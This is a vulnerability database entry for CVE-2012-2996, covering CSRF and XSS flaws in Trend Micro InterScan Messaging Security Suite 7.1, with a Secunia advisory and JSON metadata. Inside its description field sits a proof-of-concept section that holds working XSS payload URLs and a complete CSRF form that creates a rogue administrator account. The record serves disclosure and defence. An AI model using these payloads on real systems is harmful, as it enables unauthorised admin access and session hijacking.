VAR-201209-0238

Vulnerability from variot - Updated: 2022-05-04 08:58

Cross-site request forgery (CSRF) vulnerability in saveAccountSubTab.imss in Trend Micro InterScan Messaging Security Suite 7.1-Build_Win32_1394 allows remote attackers to hijack the authentication of administrators for requests that create admin accounts via a saveAuth action. A cross-site scripting vulnerability. 2. An HTML-injection vulnerability. 3. A cross-site request-forgery vulnerability. An attacker can exploit these issues to steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user's session, or to disclose sensitive-information. ----------------------------------------------------------------------

The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/


TITLE: Trend Micro InterScan Messaging Security Suite Cross-Site Scripting and Request Forgery

SECUNIA ADVISORY ID: SA50620

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/50620/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=50620

RELEASE DATE: 2012-09-17

DISCUSS ADVISORY: http://secunia.com/advisories/50620/#comments

AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)

http://secunia.com/advisories/50620/

ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS

https://ca.secunia.com/?page=viewadvisory&vuln_id=50620

ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING

http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

DESCRIPTION: Two vulnerabilities have been reported in Trend Micro InterScan Messaging Security Suite, which can be exploited by malicious people to conduct cross-site scripting and request forgery attacks.

1) The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to e.g. create an arbitrary user with administrative privileges if a logged-in administrative user visits a malicious web site

2) Input passed to the "src" parameter in initUpdSchPage.imss is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerabilities are reported in version 7.1-Build_Win32_1394. Other versions may also be affected.

SOLUTION: No official solution is currently available.

PROVIDED AND/OR DISCOVERED BY: US-CERT credits Tom Gregory.

ORIGINAL ADVISORY: http://www.kb.cert.org/vuls/id/471364

OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. # Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF

Date: 13/09/2012

Exploit Author: modpr0be (modpr0be[at]spentera.com)

Vendor Homepage: http://www.trendmicro.com

Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip

Version: 7.1-Build_Win32_1394

Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config)

CVE : CVE-2012-2995, CVE-2012-2996

Software Description

TrendMicro Interscan Messaging Security is the industry’s most comprehensive

mail gateway security. Choose state-of-the-art software or a hybrid solution

with on-premise virtual appliance and optional cloud pre-filter that blocks

the vast majority of spam and malware outside your network. Plus our Data

Privacy and Encryption Module secure outbound data to ensure privacy and

regulatory compliance.

Proof of Concept

Persistent/Stored XSS

this POC will store defined URL to white list URL page. Each time we access to this page, the XSS word

will pop up to the user. You can change the alert message box to something nasty (e.g redirect to beef??)

hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss">alert('XSS')

Non-persistent/Reflected XSS

This is non-persistent XSS, you might lure target user to click this link :)

hxxps://127.0.0.1/initUpdSchPage.imss?src=">alert('XSS')

Cross-Site Request Forgery

This POC should be targeted to user with admin privilege

It will add admin user with user quorra, and password quorra.123

Target victim must be authenticated when perform this POC

References

http://www.spentera.com/advisories/2012/SPN-05-2012.html

http://www.kb.cert.org/vuls/id/471364

http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201209-0238",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "interscan messaging security suite",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "trendmicro",
        "version": "7.1"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "trend micro",
        "version": null
      },
      {
        "model": "interscan messaging security suite",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "trend micro",
        "version": "7.0 (linux version and  solaris edition )"
      },
      {
        "model": "interscan messaging security suite",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "trend micro",
        "version": "7.1 (linux version and  windows edition )"
      },
      {
        "model": "interscan messaging security virtual appliance",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "trend micro",
        "version": "7.0"
      },
      {
        "model": "interscan messaging security virtual appliance",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "trend micro",
        "version": "8.0"
      },
      {
        "model": "interscan messaging security virtual appliance",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "trend micro",
        "version": "8.2"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#471364"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-004436"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201209-365"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-2996"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:trendmicro:interscan_messaging_security_suite:7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2012-2996"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Tom Gregory",
    "sources": [
      {
        "db": "BID",
        "id": "55542"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2012-2996",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 6.8,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2012-2996",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 1.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2012-2996",
            "trust": 1.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201209-365",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-004436"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201209-365"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-2996"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cross-site request forgery (CSRF) vulnerability in saveAccountSubTab.imss in Trend Micro InterScan Messaging Security Suite 7.1-Build_Win32_1394 allows remote attackers to hijack the authentication of administrators for requests that create admin accounts via a saveAuth action. A cross-site scripting vulnerability. \n2. An HTML-injection vulnerability. \n3. A cross-site request-forgery vulnerability. \nAn attacker can exploit these issues to steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user\u0027s session, or to disclose sensitive-information. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nTrend Micro InterScan Messaging Security Suite Cross-Site Scripting\nand Request Forgery\n\nSECUNIA ADVISORY ID:\nSA50620\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/50620/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50620\n\nRELEASE DATE:\n2012-09-17\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/50620/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/50620/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50620\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nTwo vulnerabilities have been reported in Trend Micro InterScan\nMessaging Security Suite, which can be exploited by malicious people\nto conduct cross-site scripting and request forgery attacks. \n\n1) The application allows users to perform certain actions via HTTP\nrequests without performing any validity checks to verify the\nrequests. This can be exploited to e.g. create an arbitrary user with\nadministrative privileges if a logged-in administrative user visits a\nmalicious web site\n\n2) Input passed to the \"src\" parameter in initUpdSchPage.imss is not\nproperly sanitised before being returned to the user. This can be\nexploited to execute arbitrary HTML and script code in a user\u0027s\nbrowser session in context of an affected site. \n\nThe vulnerabilities are reported in version 7.1-Build_Win32_1394. \nOther versions may also be affected. \n\nSOLUTION:\nNo official solution is currently available. \n\nPROVIDED AND/OR DISCOVERED BY:\nUS-CERT credits Tom Gregory. \n\nORIGINAL ADVISORY:\nhttp://www.kb.cert.org/vuls/id/471364\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. # Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF\n# Date: 13/09/2012\n# Exploit Author: modpr0be (modpr0be[at]spentera.com)\n# Vendor Homepage: http://www.trendmicro.com\n# Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip\n# Version: 7.1-Build_Win32_1394\n# Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config)\n# CVE : CVE-2012-2995, CVE-2012-2996\n \n# Software Description\n# TrendMicro Interscan Messaging Security is the industry\u2019s most comprehensive\n# mail gateway security. Choose state-of-the-art software or a hybrid solution\n# with on-premise virtual appliance and optional cloud pre-filter that blocks\n# the vast majority of spam and malware outside your network. Plus our Data\n# Privacy and Encryption Module secure outbound data to ensure privacy and\n# regulatory compliance. \n \n# Proof of Concept\n# Persistent/Stored XSS\n# this POC will store defined URL to white list URL page. Each time we access to this page, the XSS word\n# will pop up to the user. You can change the alert message box to something nasty (e.g redirect to beef??)\nhxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss\"\u003e\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\n \n# Non-persistent/Reflected XSS\n# This is non-persistent XSS, you might lure target user to click this link :)\nhxxps://127.0.0.1/initUpdSchPage.imss?src=\"\u003e\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\n \n# Cross-Site Request Forgery\n# This POC should be targeted to user with admin privilege\n# It will add admin user with user quorra, and password quorra.123\n# Target victim must be authenticated when perform this POC\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cform action=\"hxxps://127.0.0.1:8445/saveAccountSubTab.imss\" method=\"POST\"\u003e\n\u003cinput type=\"hidden\" name=\"enabled\" value=\"on\" /\u003e\n\u003cinput type=\"hidden\" name=\"authMethod\" value=\"1\" /\u003e\n\u003cinput type=\"hidden\" name=\"name\" value=\"quorra\" /\u003e\n\u003cinput type=\"hidden\" name=\"password\" value=\"quorra.123\" /\u003e\n\u003cinput type=\"hidden\" name=\"confirmPwd\" value=\"quorra.123\" /\u003e\n\u003cinput type=\"hidden\" name=\"tabAction\" value=\"saveAuth\" /\u003e\n\u003cinput type=\"hidden\" name=\"gotoTab\" value=\"saveAll\" /\u003e\n\u003cinput type=\"submit\" value=\"CSRF\" /\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n \n# References\n# http://www.spentera.com/advisories/2012/SPN-05-2012.html\n# http://www.kb.cert.org/vuls/id/471364\n# http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2012-2996"
      },
      {
        "db": "CERT/CC",
        "id": "VU#471364"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-004436"
      },
      {
        "db": "BID",
        "id": "55542"
      },
      {
        "db": "PACKETSTORM",
        "id": "116624"
      },
      {
        "db": "PACKETSTORM",
        "id": "116566"
      }
    ],
    "trust": 2.79
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#471364",
        "trust": 3.7
      },
      {
        "db": "NVD",
        "id": "CVE-2012-2996",
        "trust": 2.8
      },
      {
        "db": "SECUNIA",
        "id": "50620",
        "trust": 1.8
      },
      {
        "db": "SECTRACK",
        "id": "1027544",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-004436",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201209-365",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "55542",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "116624",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "116566",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#471364"
      },
      {
        "db": "BID",
        "id": "55542"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-004436"
      },
      {
        "db": "PACKETSTORM",
        "id": "116624"
      },
      {
        "db": "PACKETSTORM",
        "id": "116566"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201209-365"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-2996"
      }
    ]
  },
  "id": "VAR-201209-0238",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.29385966
  },
  "last_update_date": "2022-05-04T08:58:04.540000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "InterScan Messaging Security",
        "trust": 0.8,
        "url": "http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html"
      },
      {
        "title": "CVE-2012-2996\u3000\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30ea\u30af\u30a8\u30b9\u30c8\u30d5\u30a9\u30fc\u30b8\u30a7\u30ea(CSRF)\u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066",
        "trust": 0.8,
        "url": "http://esupport.trendmicro.co.jp/pages/jp-2081970.aspx"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-004436"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-352",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-004436"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-2996"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.9,
        "url": "http://www.kb.cert.org/vuls/id/471364"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/50620"
      },
      {
        "trust": 1.0,
        "url": "http://www.securitytracker.com/id?1027544"
      },
      {
        "trust": 0.9,
        "url": "http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/352.html"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/79.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2996"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu471364/"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-2996"
      },
      {
        "trust": 0.3,
        "url": "http://apac.trendmicro.com/apac/products/enterprise/interscan-messaging-security-suite/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_intelligence/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/blog/325/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/50620/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/50620/"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50620"
      },
      {
        "trust": 0.1,
        "url": "http://www.trendmicro.com/ftp/products/interscan/imss_v7.1_win_1394.zip"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2996"
      },
      {
        "trust": 0.1,
        "url": "http://www.spentera.com/advisories/2012/spn-05-2012.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2995"
      },
      {
        "trust": 0.1,
        "url": "http://www.trendmicro.com"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#471364"
      },
      {
        "db": "BID",
        "id": "55542"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-004436"
      },
      {
        "db": "PACKETSTORM",
        "id": "116624"
      },
      {
        "db": "PACKETSTORM",
        "id": "116566"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201209-365"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-2996"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#471364"
      },
      {
        "db": "BID",
        "id": "55542"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-004436"
      },
      {
        "db": "PACKETSTORM",
        "id": "116624"
      },
      {
        "db": "PACKETSTORM",
        "id": "116566"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201209-365"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-2996"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-09-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#471364"
      },
      {
        "date": "2012-09-13T00:00:00",
        "db": "BID",
        "id": "55542"
      },
      {
        "date": "2012-09-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-004436"
      },
      {
        "date": "2012-09-18T11:57:52",
        "db": "PACKETSTORM",
        "id": "116624"
      },
      {
        "date": "2012-09-15T00:19:52",
        "db": "PACKETSTORM",
        "id": "116566"
      },
      {
        "date": "2012-09-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201209-365"
      },
      {
        "date": "2012-09-17T14:55:00",
        "db": "NVD",
        "id": "CVE-2012-2996"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-08-15T00:00:00",
        "db": "CERT/CC",
        "id": "VU#471364"
      },
      {
        "date": "2012-09-13T00:00:00",
        "db": "BID",
        "id": "55542"
      },
      {
        "date": "2012-10-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-004436"
      },
      {
        "date": "2012-09-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201209-365"
      },
      {
        "date": "2013-04-13T02:54:00",
        "db": "NVD",
        "id": "CVE-2012-2996"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201209-365"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and CSRF vulnerabilities",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#471364"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "cross-site request forgery",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201209-365"
      }
    ],
    "trust": 0.6
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…